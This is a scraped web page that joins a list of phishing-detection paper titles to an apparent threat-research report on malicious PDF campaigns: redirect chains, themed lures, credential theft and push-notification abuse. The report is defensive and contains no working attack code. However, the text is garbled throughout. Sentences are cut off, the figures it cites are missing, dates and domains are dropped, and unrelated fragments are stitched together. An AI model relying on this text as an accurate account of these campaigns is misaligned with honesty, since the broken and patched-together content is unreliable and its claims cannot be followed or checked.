Background Citations. Methods Citations. Topics from this paper. Phishing Web page. Web search engine Multitier architecture. Citation Type. Has PDF. Publication Type. More Filters. A keyword-based combination approach for detecting phishing webpages. Jail-Phish: An improved search engine based phishing detection system. View 1 excerpt, cites background. View 1 excerpt. Identification of phishing webpages and its target domains by analyzing the feign relationship. CatchPhish: detection of phishing websites by inspecting URLs.
Machine learning based phishing detection from URLs. PhishDump: A multi-model ensemble based technique for the detection of phishing sites in mobile devices.
Phishing website detection using URL-assisted brand name weighting system. An efficacious method for detecting phishing webpages through target domain identification.
Utilisation of website logo for phishing detection. In , we observed more than 5 million malicious PDF files. Table 1 shows the increase in the percentage of malicious PDF files we observed in compared to Table 1. Distribution of malicious PDF samples in and The pie chart in Figure 1 gives an overview of how each of the top trends and schemes were distributed. In the following sections, we will go over each scheme in detail. After studying different malicious PDF campaigns, we found a common technique that was used among the majority of them: usage of traffic redirection.
Before we review the different PDF phishing campaigns, we will discuss the importance of traffic redirection in malicious and phishing PDF files. The links embedded in phishing PDF files often take the user to a gating website, from where they are either redirected to a malicious website, or to several of them in a sequential manner. Instead of embedding a final phishing website — which can be subject to frequent takedowns — the attacker can extend the shelf life of the phishing PDF lure and also evade detection.
Additionally, the final objective of the lure can be changed as needed e. We identified the top five phishing schemes from our dataset and will break them down in the order of their distribution.
It is important to keep in mind that phishing PDF files often act as a secondary step and work in conjunction with their carrier e. The second category that we identified were phishing PDF files that were coupon-themed and often used a logo of a prominent oil company. Figure 3 shows an example of these types of phishing PDF files:.
Similar to other campaigns we observed, these phishing files also leveraged traffic redirection for reasons mentioned previously. Upon analyzing several of them, we found out that they use two traffic redirectors.
Figure 4 shows the chain for a sample SHA b7e09ba90eea66a5c3cfbdeddeabe. The gating website took us to another website track[. All these redirections happened through HTTP response messages. These phishing files do not necessarily carry a specific message, as they are mostly static images with a picture of a play button ingrained in them. Although we observed several categories of images, a significant portion of them either used nudity or followed specific monetary themes such as Bitcoin, stock charts and the like to lure users into clicking the play button.
Figure 6 shows a PDF file with a Bitcoin logo and a clickable play button. Upon clicking the play button, we were again, as expected, redirected to another website. From the domain name, one could assume the website is also within the realm of online dating. However, at the time of this writing, this website had been taken down. Unlike the previous campaign, there was only one redirector involved, and we noticed that all the redirectors had the format of: 6-digit-alphanumeric-unique-id[dot]sed followed by a main domain as listed below.
They often inform the user that someone has shared a document with them. However, due to reasons which can vary from one PDF file to another, the user cannot see the content and apparently needs to click on an embedded button or a link. Figure 7 shows a PDF with a Dropbox logo asking the user to click on the button to request access. As the number of cloud-based file sharing services increases, it would not be surprising to see this theme surge and continue to be among the most popular approaches.
We were given two options to use for signing in: Microsoft email or other email services. Atlassian Stack is geared towards enterprises, so we assume that this campaign was targeting enterprise users. Each of those links were designed to look like a legitimate email sign-on page. After we entered a fake email address, we proceeded to another page that asked us to enter our password, as shown in Figure We observed that the stolen credentials were sent on the attacker's server through the parameters in a GET request, as shown in Figure After entering the test credentials, we were taken back to the first login page.
We would like to note that, at the time that we visited this website, it was already flagged as phishing by major browsers such as Google Chrome and Mozilla Firefox. However, we clicked through the warning page to investigate further. Incorporating e-commerce themes into phishing emails and documents is not a new trend.
However, we observed an upward trend in the number of fraudulent PDF files that used common e-commerce brands to trick users into clicking on embedded links. Figure 14, similarly, shows a PDF file telling the user their Apple ID account will be suspended if they do not click on the link to update their information.
At the time of this writing, all the websites for this specific campaign were taken down. Examples include:. As mentioned earlier, traffic redirection websites do not point to a fixed website, and they often redirect the user to a different website upon each visit. To understand the whole chain, we followed the link from Figure The response was a multi-function JavaScript code that can be seen in Figure Essentially, the code listed above registers a browser push notification. Figure When the user agrees and subscribes to the push notification, the function SubS from Figure 17 is called, which sends a POST request to let the controller know that the user has subscribed to them.
Figure 19 shows the specific POST request. This loop can go on a few times. However, it is important to note that the site does not have to be open in the browser for the notifications to pop. After completing the chain, we noticed two push notifications were registered in our browser, as shown in Figure At the end, we landed on an online gaming website. As we can see, there are a lot of parameters involved with the above GET request.
It is our assumption that this is how the attackers generate revenue. These identifiers tell the owner of the website how the user got there.
0コメント